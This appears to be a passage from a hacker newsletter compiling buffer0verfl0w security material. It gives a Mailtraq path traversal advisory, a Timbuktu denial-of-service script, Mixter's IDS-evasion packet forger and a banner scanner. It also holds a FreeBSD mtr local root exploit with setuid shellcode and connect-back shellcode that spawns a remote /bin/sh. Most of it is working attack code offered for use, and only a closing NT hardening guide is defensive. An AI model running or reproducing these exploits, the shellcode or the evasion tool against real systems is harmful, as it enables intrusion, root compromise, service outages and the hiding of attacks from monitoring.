we did it this way: http://127.0.0.1/../../../../../../../../../../././../../././..././.../.../windows/ Here it is!!! The complete listing of C:\windows . Now this is as far as we go. On Windows NT machines running Mailtraq You could just get sam._ , run l0phtcrack against it and compromise the machine. There is also a bug that allows the remote attacker to find out in what directory is Mailtraq installed in. By inputing a large string after http://some.domain.com/ the server will return the path to Mailtraq's installation directory. Exsample: http://127.0.0.1/../aaaaaaaaa[a lot of a's]aaaaaaa The output You should get will look like this: File "C:\Program Files\Mailtraq\websys\webmail\aaaaaa[a lot of a's]aaaaaa" could not be found * Vulnerable Versions We tested version 1.1.4. on Windows 98. All versions prior to 1.1.4 are vulnerable. We aren't sure if the Windows NT version is affected. * Fix At this time we aren't familiar with any fix for this bug. copyright © 1999-2000 slash, buffer0verfl0w security www.b0f.com @HWA 24.0 [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding to connections ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/bin/sh # *Needs netcat in order to work......* # Immune systems: # Timbuktu Pro 2000 # # Vulnerable systems: # Timbuktu Pro 2.0b650 (Also incorrectly known as Timbukto) # # Exploit: # - Connect and disconnect to port TCP/407 and port TCP/1417 will start # listening. # - Connect on port TCP/1417 (using a simple telnet client). # - Disconnect from TCP/1417 (with no data exchange). # # Workaround: # - Kill Timbuktu process (using pslist/pskill for example). # - Stop Timbuktu services. # - Start them again. echo "Exploit:" echo " - Connect and disconnect to port TCP/407 and port TCP/1417 will start listening." echo " - Connect on port TCP/1417 (using a simple telnet client)." echo " - Disconnect from TCP/1417 (with no data exchange)." echo "Coded: eth0 from buffer0vefl0w security (b0f)" echo "[http://b0f.freebsd.lublin.pl]" echo "Checking if host is actually listening on port 407" telnet $1 407 1>.timb.tmp 2>.timb.tmp & echo "Sleeping 5 seconds..." sleep 5 killall -9 telnet 1>/dev/null 2>/dev/null cat .timb.tmp | grep "Connected" >/dev/null 2>&1 if [ $? -eq 0 ]; then timb="1" echo "[$1] is listening on port 407..." echo "Exploiting:..." nc $1 1417 1>/dev/null 2>/dev/null sleep 3 killall -9 nc 1>/dev/null 2>/dev/null echo "Done!!" fi if [ "$timb" != "1" ]; then echo "[$1] Is not listening on port 407 = doesn't exist..." fi @HWA 25.0 [b0f] ides.c:'Intrusion Detection Evasion System' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * ides version 0.3 - 'intrusion detection evasion system' * (c) Jan 2000 by Mixter * * IDES will go into background and watch incoming traffic, inserting forged * TCP ack, rst and fin packets for every transmitted data packet. The sessions * will not be affected, since the sequence numbers change, but all sniffing * and monitoring software that evaluates raw packets is possibly tricked into * evaluating the forged data or seeing reset connections, making logging * unreliable or impossible. As a second feature, IDES will create a custom * amount of fake SYNs on each valid tcp connection request, transparently * simulating coordinated/decoy scans from random source addresses. * IDES can be used on a remote host or locally to fool sniffers, IDS and * other network monitors and to generate random decoy probes while scanning. * Acknowledgements: MUCH of this idea is from stran9ers (private) code, which * is better to configure, and from horizons article in Phrack 54. * * Changes: * v 0.3 - code sanitized, prevent generation of ACK storms/feedback loops * v 0.2 - now uses a unique XOR (ph33r) challenge value for each process */ #define DECOYS 10 /* number of forged SYNs to send on each tcp connection initiation */ #undef DEBUG /* stay in foreground + dump packet info */ #undef NO_INADDR /* solaris */ #include #include #include #include #include #include #include #include #ifndef IP_HDRINCL #define IP_HDRINCL 3 #endif #ifndef PF_INET #define PF_INET 2 #endif #ifndef AF_INET #define AF_INET PF_INET #endif typedef unsigned char u8; typedef unsigned short int u16; typedef unsigned int u32; #ifndef NO_INADDR #ifndef in_addr struct in_addr { unsigned long int s_addr; }; #endif #endif #ifndef htons #if __BYTE_ORDER == __BIG_ENDIAN #define ntohl(x) (x) #define ntohs(x) (x) #define htonl(x) (x) #define htons(x) (x) #else unsigned long int htonl (unsigned long int hostlong); unsigned short int htons (unsigned short int hostshort); unsigned long int ntohl (unsigned long int netlong); unsigned short int ntohs (unsigned short int netshort); #endif #endif #define IP 0 #define TCP 6 #define RAW 255 struct sa { u16 fam, dp; u32 add; u8 zero[8]; } sadd; struct ip { #if __BYTE_ORDER == __LITTLE_ENDIAN u8 ihl:4, ver:4; #else u8 ver:4, ihl:4; #endif u8 tos; u16 tl, id, off; u8 ttl, pro; u16 sum; u32 src, dst; } *ih; struct tcp { u16 src, dst; u32 seq, ackseq; #if __BYTE_ORDER == __LITTLE_ENDIAN u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, res2:2; #else u16 doff:4, res1:4, res2:2, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1; #endif u16 win, sum, urp; } *th; unsigned short ip_sum (unsigned short *, int); unsigned short ip_sum (addr, len) unsigned short *addr; int len; { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(unsigned char *) (&answer) = *(unsigned char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } char rseed[65535]; int rcounter = 0; void random_init (void) { int rfd = open ("/dev/urandom", O_RDONLY); if (rfd < 0) rfd = open ("/dev/random", O_RDONLY); rcounter = read (rfd, rseed, 65535); close (rfd); } inline long getrandom (int min, int max) { if (rcounter < 2) random_init (); srand (rseed[rcounter] + (rseed[rcounter - 1] << 8)); rcounter -= 2; return ((random () % (int) (((max) + 1) - (min))) + (min)); } u32 magic; char packet[1024], *dh; #define GETLRANDOM (getrandom (0, 65535) * getrandom (0, 65535)) #define CLONED ((ntohl(th->seq) == (ntohl (ih->src)^magic))) void syndecoy (int s) { #ifdef DEBUG printf ("*"); #endif sadd.fam = AF_INET; sadd.dp = th->dst; sadd.add = ih->dst; ih->ver = 4; ih->ihl = 5; ih->tos = 0x00; ih->tl = sizeof (struct ip) + sizeof (struct tcp); ih->id = getrandom (0, 65535); ih->off = 0; ih->ttl = getrandom (200, 255); ih->pro = TCP; ih->sum = 0; ih->src = htonl (GETLRANDOM); th->seq = htonl (ntohl (ih->src) ^ magic); th->ackseq = 0; th->res1 = 0; th->doff = 0; th->fin = 0; th->syn = 1; th->ack = 0; th->rst = 0; th->psh = 0; th->ack = 0; th->urg = 1; th->res2 = 0; th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1); ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1); memset (dh, 0, 256); sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd)); } void idscrew (int s) { int flg = ((th->ack) && (!th->psh)), rl = getrandom (0, 256); #ifdef DEBUG printf ("."); #endif sadd.fam = AF_INET; sadd.dp = th->dst; sadd.add = ih->dst; ih->ver = 4; ih->ihl = 5; ih->tos = 0x00; ih->tl = sizeof (struct ip) + sizeof (struct tcp); ih->id = getrandom (0, 65535); ih->off = 0; ih->ttl = getrandom (200, 255); ih->pro = TCP; ih->sum = 0; th->seq = htonl (ntohl (ih->src) ^ magic); th->ackseq = htonl (GETLRANDOM); th->res1 = 0; th->doff = 0; th->fin = 0; th->syn = 0; th->ack = 1; th->rst = 0; th->psh = 1; th->ack = 0; th->urg = 0; th->res2 = 0; memset (dh, 0, 256); th->ack = 0; th->psh = 0; th->rst = 1; th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1); ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1); sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd)); if (flg) /* this is necessary to prevent ev1l ACK st0rmz#@!$ */ return; th->rst = 0; th->fin = 1; th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + 1) & ~1); ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + 1) & ~1); sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp), 0, (struct sockaddr *) &sadd, sizeof (sadd)); ih->tl += rl; th->fin = 0; th->ack = 1; memcpy (dh, rseed + getrandom (0, 5000), rl); th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1); ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1); sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd)); th->psh = 1; memcpy (dh, rseed + getrandom (0, 5000), rl); th->sum = ip_sum ((u16 *) packet, (sizeof (struct ip) + sizeof (struct tcp) + rl + 1) & ~1); ih->sum = ip_sum ((u16 *) packet, (4 * ih->ihl + sizeof (struct tcp) + rl + 1) & ~1); sendto (s, packet, 4 * ih->ihl + sizeof (struct tcp) + rl, 0, (struct sockaddr *) &sadd, sizeof (sadd)); ih->tl -= rl; } int main (int argc, char **argv) { char *opt = "1"; int i = 0, s = socket (AF_INET, SOCK_RAW, TCP); magic = GETLRANDOM; /* initialize our magic challenge */ ih = (struct ip *) packet; th = (struct tcp *) (packet + sizeof (struct ip)); dh = (char *) (packet + sizeof (struct ip) + sizeof (struct tcp)); #ifndef DEBUG if ((i = fork ())) { printf ("%s launching into the background (pid: %d)\n", argv[0], i); exit (0); } #endif if (s < 0) perror (""); if (setsockopt (s, IP, IP_HDRINCL, opt, sizeof (opt)) < 0) perror (""); while (1) { if (read (s, packet, 1020) > 0) if ((!CLONED) && (th->ack)) { #ifdef DEBUG printf ("Seq: %lu, ack: %lu, src: %lu (S%dA%dP%dF%dR%dU%d)\n", ntohl (th->seq), ntohl (th->ackseq), ntohl (ih->src), th->syn, th->ack, th->psh, th->fin, th->rst, th->urg); fflush (stdout); #endif if (th->syn) for (i = 0; i < DECOYS; i++) syndecoy (s); else if ((!th->fin) && (!th->rst)) idscrew (s); } memset (packet, 0, 1024); } return 0; } /* $t34lthy OoOoO . h4x3r _______( o__ o |___\ 0|_ | _ ( _| O / 0|___||_O(___| ( 1 4m h1d1ng!@$ ) */ @HWA 26.0 [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. used to log bind, pop3, imap, etc banners from many hosts quickly. /* lscan2.c - 1999 (c) Mixter */ /* compile: gcc -O3 -s -Wall lscan2.c -o lscan */ #define INITIAL_TIMEOUT 5 // how long to wait for a connection #define WAIT_FORK 550000 // wait 1/2 second between forks #define BIND "ns.log" #define POP "pop.log" #define IMAP "imap.log" #define RPC "mountd.log" #define FTP "ftp.log" #define STATUSLOG "status.log" #include #include #include #include #include #include #include #include #include #include #include #include #include #define SSA sizeof(struct sockaddr) #define SOX socket(AF_INET,SOCK_STREAM,0) int s1,s2,s3,s4,s5; int ncon(int tsock, char *ip, int port, int timeout); void invoke(struct hostent *host, int port); // udp send void usage(char *name, char *text); // print usage & die int validip(char *ip); // check and correct ip address void fchk(FILE *fp); // check a file void timedout(int sig); // dummy function int background(); // background a process void scan0r(char *ip); // log services for one ip char buf[75]; // read the first 75 chars from a server int main(int argc,char **argv) { FILE *data,*err; char ip[30]; int pid; if((argc!=2)) usage(argv[0],""); fprintf(stderr,"lamerz scan 1.0 by Mixter\n"); fprintf(stderr,"scanning from %s (pid: %d)\n" ,argv[1] ,(pid=background())); signal(SIGHUP,SIG_IGN); signal(SIGCHLD,SIG_IGN); // zombies suck fchk(data=fopen(argv[1],"r")); fchk(err=fopen(STATUSLOG,"a")); fprintf(err,"Started new session. File: %s, PID: %d\n",argv[1],pid); while(!feof(data)) { fscanf(data,"%s\n",ip); if(validip(ip)==1) { usleep(WAIT_FORK); // wait between fork()'s (1/2 second default) if ((pid=vfork()) < 0) { perror("fork"); exit(1); } if (pid==0) // child { scan0r(ip); // collect data for this host & save into files raise(9); return 0; } } else fprintf(err,"Invalid IP: %s\n",ip); } sleep(60); // wait for the last childs fprintf(err,"Finished session. File: %s\n",argv[1]); return 0; } void scan0r(char *ip) { int tout=INITIAL_TIMEOUT, s1=SOX,s2=SOX,s3=SOX,s4=SOX,s5=SOX, bind,pop,imap,rpc,ftp; FILE *f1,*f2,*f3,*f4,*f5; fchk(f1=fopen(BIND,"a")); fchk(f2=fopen(POP,"a")); fchk(f3=fopen(IMAP,"a")); fchk(f4=fopen(RPC,"a")); fchk(f5=fopen(FTP,"a")); rpc=ncon(s4,ip,635,tout); // we check port 635 because 2.2b29 // mountd always binds on that one if(rpc==-9) return; // host timed out else if(rpc>=0) fprintf(f4,"%s\n",ip); // log mountd connect pop=ncon(s2,ip,110,tout); if(pop==-9) return; // host timed out else if(pop>=0) { bzero(buf,sizeof(buf)); read(s2,buf,sizeof(buf)); // get popper version fprintf(f2,"%s %s\n",ip,buf); // log popper connect } pop=ncon(s2,ip,109,tout); if(pop==-9) return; // host timed out else if(pop>=0) { bzero(buf,sizeof(buf)); read(s2,buf,sizeof(buf)); // get popper version fprintf(f2,"%s !POP2! %s\n",ip,buf); // log popper connect } imap=ncon(s3,ip,143,tout); if(imap==-9) return; // host timed out else if(imap>=0) { bzero(buf,sizeof(buf)); read(s3,buf,sizeof(buf)); // get imap version fprintf(f3,"%s %s\n",ip,buf); // log imap connect } bind=ncon(s1,ip,53,tout); tout -= 2; // wait 2 seconds less if(bind==-9) return; // host timed out else if(bind>=0) // log dns connect fprintf(f1,"%s\n",ip); ftp=ncon(s5,ip,21,tout); if(ftp==-9) return; // host timed out else if(ftp>=0) { bzero(buf,sizeof(buf)); read(s5,buf,sizeof(buf)); // get ftp version fprintf(f5,"%s %s\n",ip,buf); // log ftp connect } fclose(f1); fclose(f2); fclose(f3); fclose(f4); fclose(f5); raise(9); return; } int ncon(int tsock, char *ip, int port, int timeout) { int probe; struct sockaddr_in target; target.sin_family = AF_INET; target.sin_port = htons(port); target.sin_addr.s_addr = inet_addr(ip); bzero(&target.sin_zero,8); alarm(0); signal(SIGALRM,timedout); alarm(timeout); probe = connect(tsock, (struct sockaddr *)&target, SSA); alarm(0); if(probe < 0) { close(tsock); if(errno == EINTR) return -9; if(errno == ETIMEDOUT) return -9; } return probe; } void usage(char *name,char *text) { printf("usage: %s %s\n",name,text); exit(EXIT_FAILURE); } int validip(char *ip) { int a,b,c,d,*x; sscanf(ip,"%d.%d.%d.%d",&a,&b,&c,&d); x=&a; if(*x < 0) return 0; if(*x > 255) return 0; x=&b; if(*x < 0) return 0; if(*x > 255) return 0; x=&c; if(*x < 0) return 0; if(*x > 255) return 0; x=&d; if(*x < 0) return 0; if(*x > 255) return 0; sprintf(ip,"%d.%d.%d.%d",a,b,c,d); // truncate possible garbage data return 1; } void fchk(FILE *fp) { if(fp==NULL) { fprintf(stderr,"Error opening file or socket.\n"); exit(EXIT_FAILURE); } return; } void timedout(int sig) { alarm(0); raise(9); } int background() { int pid; signal(SIGCHLD,SIG_IGN); pid = fork(); if(pid<0) return -1; // fork failed if(pid>0) { sleep(1); exit(EXIT_SUCCESS); // parent, exit } if(pid==0) { signal(SIGCHLD,SIG_DFL); return getpid(); // child, go on } return -2; // shouldnt happen } @HWA 27.0 [b0f] Pseudo Cryptographic Filesystem.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. Creates a fake CFS directory that is indistinguishable from real ones /* * pcfs - pseudo cryptographic file system * (c) 2000 by Mixter * * This tool just creates a recursive directory and file structure * that contains purely random data, but is indistinguishable from a * encrypted CFS directory, unless an extensive cryptanalysis is performed. * This can be taken as a proof that a strange directory cannot easily be * proven to actually contain encrypted data. May be useful against f3dz, * just for decoy purposes, or to keep people from analyzing your * cryptographic file systems structure. Distributed according to the GPL. * * WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT * CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P * This code was reviewed and approved by the SCC (sloppy code commission) * gcc -Wall -O2 pcfs.c -o pcfs */ #include #include #include #include #include #include #include #include #include #define START_PATH "fake" mode_t modes[7] = {00755, 00644, 0000, 00664, 00700, 00777, 00444}; char chr[16] = "abcdef1234567890", rseed[65535], buffer[256]; char wd[200]; int rcounter = 0; void random_init (void); inline long gr (int, int); char *rname (void); mode_t rmode (void); void mkfiles (void); void mkd (char *, int); int main (void) { printf ("Creating fake file system in %s/%s, press a key\n", getcwd (wd, 200), START_PATH); (void) getchar (); printf ("Hit CTRL+C to stop - creating files"); if (!geteuid ()) setpriority (PRIO_PROCESS, 0, -10); mkd (START_PATH, 0); return 0; } void mkd (char *dirname, int forking) { printf ("."); fflush (stdout); if (forking) if (fork ()) return; mkdir (dirname, rmode ()); getcwd (wd, 200); strcat (wd, "/"); strcat (wd, dirname); chdir (wd); if (forking) mkfiles (); else { char smbuf[32]; int a, f = open ("/dev/urandom", O_RDONLY); read (f, smbuf, 32); a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* hash */ write (a, smbuf, gr (5, 10)); close (a); sprintf (smbuf, "%ld", gr (1, 5)); a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* algorithm */ write (a, smbuf, strlen(smbuf)); close (a); read (f, smbuf, 32); a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* encrypted key */ write (a, smbuf, 32); close (a); close (f); sprintf (smbuf, "%ld", gr (1000, 900000)); a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* session blah */ write (a, smbuf, strlen(smbuf)); close (a); while (1) mkfiles (); } } void mkfiles (void) { while (gr (0, 25)) if (!gr (0, 10)) mkd (rname (), 1); else { int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500); char fname[256], fn2[256], big[65535]; memset (fname, 0, 256); memset (fn2, 0, 256); sprintf (fname, "%s", rname ()); sprintf (fn2, ".pvect_%s", rname ()); symlink (fname, fn2); x = open (fname, O_RDWR | O_CREAT, rmode()); read (f, big, y); write (x, big, y); close (f); close (x); } } char * rname (void) { int i; memset (buffer, 0, 256); for (i = 0; i < gr (5, 150); i++) buffer[i] = chr[gr (0, 15)]; return buffer; } mode_t rmode (void) { return (modes[gr (0, 6)]); } void random_init (void) { int rfd = open ("/dev/urandom", O_RDONLY); if (rfd < 0) rfd = open ("/dev/random", O_RDONLY); rcounter = read (rfd, rseed, 65535); close (rfd); } inline long gr (int min, int max) { if (rcounter < 2) random_init (); srand (rseed[rcounter] + (rseed[rcounter - 1] << 8)); rcounter -= 2; return ((random () % (int) (((max) + 1) - (min))) + (min)); } @HWA 28.0 [b0f] mtr-0.41 (freebsd) local root exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* mtr-0.41 (freebsd) local root exploit */ /* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */ #include #include #include #include #define NOP 0x90 #define BUFSIZE 10000 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = //seteuid(0); "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80" //setuid(0); "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80" //execl("/bin/sh", "sh", 0); "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char buf[BUFSIZE+ADDRS+1], *p; int noplen, i, ofs; long ret, *ap; if (argc < 2) { fprintf(stderr, "usage: %s ofs\nusually offset = 4000\n", argv[0]); exit(0); } ofs = atoi(argv[1]); noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); p = buf; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "ret: 0x%x\n", ret); setenv("TERMCAP", buf, 1); execl("/usr/local/sbin/mtr", "mtr", 0); return 0; } @HWA 29.0 [b0f] shellcode that connets to a host&port and starts a shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* Connecting shellcode written by lamagra lamagra is a member of b0f/buffer0verfl0w security http://lamagra.seKure.de - http://www.b0f.com file "connect" version "01.01" text .align 4 _start: #socket(AF_INET,SOCK_STREAM,IPPROTO_IP); movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax # 102 = socketcall xorl %ecx,%ecx movl %ecx,%ebx incl %ebx # socket() movl %ebx, -8(%ebp) # 1 = SOCK_STREAM incl %ebx movl %ebx, -12(%ebp) # 2 = AF_INET decl %ebx # 1 = SYS_socket movl %ecx, -4(%ebp) # 0 = IPPROTO_IP leal -12(%ebp),%ecx # put args in correct place int $0x80 # switch to kernel-mode xorl %ecx,%ecx movl %eax,-12(%ebp) # save the fd # connect(fd,(struct sockaddr *)&struct,16); incl %ebx movw %ebx,-20(%ebp) # 2 = PF_INET movw $9999,-18(%ebp) # 9999 = htons(3879); movl $0x100007f,-16(%ebp) # htonl(IP) leal -20(%ebp),%eax # struct sockaddr movl %eax,-8(%ebp) # load the struct movb $16,-4(%ebp) # 16 = sizeof(sockaddr) movl %edx,%eax # 102 = socketcall incl %ebx # 3 = SYS_connect leal -12(%ebp),%ecx # put args in place int $0x80 # call socketcall() # dup2(fd,0) xorl %ecx,%ecx movb $63,%edx # 63 = dup2() movl %edx,%eax int $0x80 #dup2(fd,1) movl %edx,%eax incl %ecx int $0x80 # arg[0] = "/bin/sh" # arg[1] = 0x0 # execve(arg[0],arg); jmp 0x18 popl %esi movl %esi,0x8(%ebp) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%ebp) movb $0xb,%al movl %esi,%ebx leal 0x8(%ebp),%ecx leal 0xc(%ebp),%edx int $0x80 call -0x1d .string "/bin/sh" */ char code[]= "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee" "\x0f\x27" // <-- port to connect to "\xc7\x45\xf0" "\x7f\x00\x00\x01" // <-- host to connect to "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0" "\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb2\x3f\x89\xd0\xcd\x80\x89\xd0" "\x41\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45" "\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff" "\xff\xff/bin/sh"; #define NAME "connecting" main() { int (*funct)(); funct = (int (*)()) code; printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code)); (int)(*funct)(); } @HWA 30.0 [b0f] NT Security check paper part 2 by Slash ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For buffer0verfl0w security written by slash tcsh@b0f.i-p.com http://www.b0f.com Windows NT Security Check Part II ================================= Introduction ------------ In Part I of "Windows NT security Check" I explained some basic things about User accounts and Logging options. In this part I'll try to explain varius Groups and User rights. Please note that any of the topics provided in these articles can be discussed on our webboard located at http://net-security.org/webboard.htm Groups ------ The membership of groups should be carefully evaluated. A group that is granted permissions to sensitive files might contain users that should not have that access. Open each group listed in the User Manager and inspect its members. - Carefully evaluate the members of management groups such as Administrators, Server Operators, Account Operators, Backup Operators, and Print Operators. Remove all unnecessary accounts. - Make sure that all administrative users have two accounts: one for administrative tasks and one for regular use. Administrators should only use their administrative accounts when absolutely necessary. - Evaluate each global group membership and the resources that the group has access to. Does the group have access in other domains? - What folders and files do groups have permission to access? - Do local groups hold global groups from other domains? Check the membership of these global groups and make sure that no users have unnecessary access to resources in the current domain The Administrator Account and Administrators Group -------------------------------------------------- The Administrator account and Administrators group have unlimited rights on the system. Therefore, you need to carefully evaluate the membership of the Administrators group and take care of some other housekeeping related to the Administrator account: - If you are taking over the management of an existing system, you should change the Administrator account name and password immediately. You do not know who might have a password that would give them access to the account. - The Administrator account is often the target of attacks because of its well-known name. You should rename the Administrator account to an obscure name and create a "decoy" account called "Administrator" with no permissions. Intruders will attempt to break in to this decoy account instead of the real account. - Enable failed logons in the auditing system to detect attempts to log on to any account, including Administrator. - Look for unnecessary accounts that have Administrator status. Perhaps an intruder has created such an account as a backdoor into the system. The Administrators group has "Access this computer from network" right, which you can block to prevent account hijacking or unauthorized activities. Without this right, administrators must log on at the computer itself in a controlled environment to do any administrative tasks. You will also need to remove the right from the Everyone group then add back in accounts that are allowed to log on from network. The Guest Account and Everyone Group ------------------------------------ Most administrators agree that it should be disabled, although removing it remove the ability of anonymous users to access a system. If You decide to enable guest account consider creating a separate domain for these public services where the Guest account is enabled. Alternatively, use a Web server for this type of system. - Users who log on as guests can access any shared folder that the Everyone group has access to (i.e., if the Everyone group has Read permissions to the Private folder, guests can access it with Read permissions). - You don't know who Guest users are and there is no accountability because all guests log in to the same account. - If you have Microsoft Internet Information Server software installed, a special Guest account called IUSR_computername exists with the rights to log on locally. Remove this account if you don't want the general public to access your Web server. Users must then have an account to access the Web server. User rights ----------- In the User Manager for Domains, check the rights that users and groups have on the system. Choose User Rights from the Policies menu to display the User Rights Policy dialog box. Initially, the box shows the basic rights. To evaluate all rights, click the Show Advanced User Rights option. Here are some considerations for basic rights: - Access this computer from the network By default, only the Administrators and the Everyone group have this right. Remove the Everyone group (why would you want everyone to access this server from the network if you are interested in security?), then add specific groups as appropriate. For example, create a new group called "Network Users" with this right, then add users who should have network access. - Backup files and directories User's with this right can potentially carry any files off-site. Carefully evaluate which users and groups have this right. Also evaluate the Restore files and directories right. - Log on locally For servers, only administrators should have this right. No regular user ever needs to logon directly to the server itself. By default, the administrative groups (Administrators, Server Manager, etc.) have this right. Make sure that any user who is a member of these groups has a separate management account. - Manage auditing and security logs Only the Administrators group should have this right. - Take ownership of files or other objects Only the Administrators group should have this right. Scan all the advanced rights to make sure that a user has not been granted rights inappropriately. Files, Folders, Permissions and Shares -------------------------------------- This discussion assumes that you are only using NTFS volumes on your servers. Do not use FAT volumes in secure installations. To check permissions on folders and other resources, you must go to each resource individually to review which users and groups have permissions. This can be a bewildering task, so for large systems obtain a copy of the Somarsoft DumpACL utility. To open the Permissions dialog box for a folder or file, right-click it and choose Properties, then click either the Sharing or the Security tab. The Sharing options show who has access to the folder over the network. The Security tab has the Permission and Auditing buttons so you can check local permissions or set auditing options. Start your evaluation with the most sensitive and critical folders if you are doing this procedure manually or performing a periodic checkup. Take care to do the following: - Check each folder and/or file to determine which local users and groups have access and whether that access is appropriate. - Check all shared folders and the share permissions on those folders to determine which network users and groups have access and whether that access is appropriate. - Program files and data files should be kept in separate folders to make management and permission setting easier. Also, if users can copy files into a data folder, remove the Execute permission on the folder to prevent someone from copying and executing a virus or Trojan Horse program. - Separate public files from private files so you can apply different permission sets. - If users or groups have access to a folder, should they have the same access to every file in the folder? To every subdirectory? Check the sensitivity of files and attached subdirectories to evaluate whether inherited permissions are appropriate. - Keep in mind that the Everyone group gets Full access by default for all new folders you create. To prevent this, change the Everyone group's permission for a folder, then any new subdirectories you create will get the new permission settings. - If the server is connected to an untrusted network such as the Internet, do not store any files on the server that are sensitive and for in-house access only. - Never share the root directory of a drive or one of the drive icons that appears in the graphical display. An exception would be sharing a Read Only CD-ROM drive for public access. - For sensitive, password protected directories, enable Auditing. Right-click a folder, click Security, then click Auditing and enable Failure to track users that are attempting unauthorized access a folder or file. Note that File and Object access must be enabled from the Audit Policies menu in the User Manager, as described later. - Use encryption wherever possible to hide and protect files. Mergent (http://www.mergent.com/) and RSA Data Systems (http://www.rsa.com/) provide encryption software for this purpose. You can remove Everyone's access to an entire folder tree by going to the root of the drive, changing the permissions, and propagating those permissions to subdirectories. Do not do this for the systemroot folder (usually C:\WINNT). You must manually update Everyone's right there. Virus and Trojan Horse Controls ------------------------------- Viruses are a particularly serious problem in the network environment because the client computer can become infected, transferring the virus to server systems. Other users may come into contact with infected files at the server. Evaluate and set the following options: - Program directories should have permissions set to Read and Execute (not Write) to prevent a virus from being written into a directory where it can be executed. To install programs, temporarily set Write on, then remove it. - Install new software on a separate, quarantined system for a test period, then install the software on working systems once you have determined that it is safe to run. - Public file sharing directories should have the least permissions possible, i.e., Read Only, to prevent virus infections. - If a user needs to put files on your server, create a "drop box" directory that has only the Write permission. Check all new files placed in this directory with a virus scanner. Implement backup policies and other protective measures. - Educate and train users. - Check the Symantec () site for interesting papers on Windows NT-specific virus issues. Auditing and Event Logs ----------------------- Check the status of audit settings by choosing Audit on the Policies menu in the User Manager for Domains. The Audit Policy dialog box appears. The settings in this box reflect the minimum settings that are appropriate for auditing in most environments. Keep in mind that auditing too many events can affect a system's performance. Protect auditing and security logs from other administrators who might change or delete them. You can grant only the Administrators group the ability to access the logs. To restrict access to only one user (the "auditor"), remove all users except the auditor from the Administrators group. This means all of your other administrators should be members of a management group that does not have the 